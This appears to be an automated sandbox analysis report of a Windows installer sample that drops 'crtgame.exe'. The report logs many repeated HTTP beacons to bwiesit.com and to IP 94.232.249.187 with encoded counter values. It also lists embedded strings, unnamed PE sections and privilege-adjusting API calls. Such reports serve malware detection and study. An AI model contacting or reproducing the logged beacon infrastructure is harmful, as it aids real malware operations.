                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945cea4de0a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cadb5cbb22 HTTP/1.1Host: bwiesit.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: bwiesit.com
                  Source: crtgame.exe, 00000006.00000002.2940328851.00000000036D2000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.000000000089F000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000867000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde2
                  Source: crtgame.exe, 00000006.00000002.2938924611.00000000008C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2
                  Source: is-RNIE1.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-BJBAO.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-HAM7K.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-HAM7K.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-2CGLR.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-58TJN.tmp.1.dr, is-HS78I.tmp.1.dr, is-V8IE4.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-HAM7K.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-HAM7K.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-QECHS.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: 6hvZpn91O8.exe, 00000000.00000003.1677333051.0000000002148000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.exe, 00000000.00000003.1677127078.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 6hvZpn91O8.tmp, 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 6hvZpn91O8.tmp.0.dr, is-4264D.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-G7PIK.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-73F5N.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-BJBAO.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-BJBAO.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-BJBAO.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-BJBAO.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-58TJN.tmp.1.dr, is-V8IE4.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-S02KC.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-HS78I.tmp.1.dr, is-640V1.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  barindex
                  Source: is-HASL7.tmp.1.drStatic PE information: section name:
                  Source: is-HASL7.tmp.1.drStatic PE information: section name:
                  Source: is-5IVSF.tmp.1.drStatic PE information: section name:
                  Source: is-5IVSF.tmp.1.drStatic PE information: section name:
                  Source: is-IG6J1.tmp.1.drStatic PE information: section name:
                  Source: is-IG6J1.tmp.1.drStatic PE information: section name:
                  Source: is-640V1.tmp.1.drStatic PE information: section name:
                  Source: is-FJ939.tmp.1.drStatic PE information: section name:
                  Source: is-FJ939.tmp.1.drStatic PE information: section name:
                  Source: is-KCF1P.tmp.1.drStatic PE information: section name:
                  Source: is-KCF1P.tmp.1.drStatic PE information: section name:
                  Source: is-HS78I.tmp.1.drStatic PE information: section name:
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-DQCHN.tmp.1.drStatic PE information: section name:
                  Source: is-BDC3N.tmp.1.drStatic PE information: section name:
                  Source: is-BDC3N.tmp.1.drStatic PE information: section name:
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-65BJ1.tmp.1.drStatic PE information: section name:
                  Source: is-ONP9R.tmp.1.drStatic PE information: section name:
                  Source: is-ONP9R.tmp.1.drStatic PE information: section name:
                  Source: is-KANF7.tmp.1.drStatic PE information: section name:
                  Source: is-KANF7.tmp.1.drStatic PE information: section name:
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-OMMAA.tmp.1.drStatic PE information: section name:
                  Source: is-UT0J0.tmp.1.drStatic PE information: section name:
                  Source: is-UT0J0.tmp.1.drStatic PE information: section name:
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: is-766CT.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_030E1EE01_2_030E1EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_030E11401_2_030E1140
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpCode function: 1_2_030E16B01_2_030E16B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_004010514_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 4_2_00401CBD4_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C25F146_2_02C25F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C2EA066_2_02C2EA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C448E96_2_02C448E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3E0656_2_02C3E065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C428746_2_02C42874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C399446_2_02C39944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 6_2_02C3A6FA6_2_02C3A6FA
